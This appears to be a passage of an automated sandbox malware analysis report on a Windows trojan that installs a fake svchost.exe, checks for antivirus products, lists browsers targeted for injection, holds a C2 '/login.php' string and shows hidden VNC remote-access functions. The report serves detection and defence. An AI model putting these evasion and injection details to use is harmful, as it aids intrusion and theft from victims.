Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|9_2_00A36370
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516842458.0000000001670000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000000.2519141431.0000000001470000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2521690463.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
Source: UMwpXhA46R.exe, UMwpXhA46R.exe, 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, UMwpXhA46R.exe, 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516842458.0000000001670000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000000.2519141431.0000000001470000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2521690463.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000000.2516842458.0000000001670000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000000.2519141431.0000000001470000.00000002.00000001.00040000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000000.2521690463.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: UMwpXhA46R.exe, 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, UMwpXhA46R.exe, 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xc:\windowsc:\windows\explorer.exeShell_TrayWnd
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00412FF0 cpuid 0_2_00412FF0
Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\UMwpXhA46R.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00402240 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402240
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_00403900 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle,2_2_02C74920
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: 0_2_004033A0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004033A0

Remote Access Functionality

barindex
Contains VNC / remote desktop functionality (version string found)
Source: UMwpXhA46R.exeString found in binary or memory: RFB 003.006
Source: UMwpXhA46R.exe, 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: UMwpXhA46R.exe, 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: UMwpXhA46R.exe, 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
Source: UMwpXhA46R.exe, 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3417374807.0000000002CD1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3417374807.0000000002CD1000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.3416553301.00000000029F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.3416553301.00000000029F3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exeString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exeString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2605884801.00000000011E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2605946728.0000000001240000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exeString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exeString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2632861320.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2635595118.0000000001040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exeString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exeString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2610626005.0000000000A20000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2610520727.00000000009C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2649599507.0000000003270000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2639594297.0000000002EA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2611939403.0000000002AF0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000010.00000002.2612614586.0000000002B80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2647909784.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2639288300.00000000011D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2694402665.0000000002AB0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2699555610.0000000002CA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2705436372.00000000024F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000002.2725518370.0000000002E80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001B.00000002.2728043702.0000000003040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000002.2759598984.00000000025F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000001E.00000002.2785000519.00000000027A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000021.00000002.2735290502.0000000000B00000.00000040.00000010.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000002.2844886273.0000000001550000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000024.00000002.2845868580.00000000015B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000002.2871812715.0000000000CD0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000027.00000002.2872659642.0000000000D30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C888F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02C888F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9E6D0 setsockopt,htons,socket,setsockopt,bind,2_2_02C9E6D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9F4A0 htons,socket,setsockopt,closesocket,bind,listen,2_2_02C9F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012588F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_012588F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0126F4A0 htons,socket,setsockopt,closesocket,bind,listen,6_2_0126F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0126E6D0 setsockopt,htons,socket,setsockopt,bind,6_2_0126E6D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010588F0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,7_2_010588F0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0106F4A0 htons,socket,setsockopt,closesocket,bind,listen,7_2_0106F4A0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0106E6D0 setsockopt,htons,socket,setsockopt,bind,7_2_0106E6D0
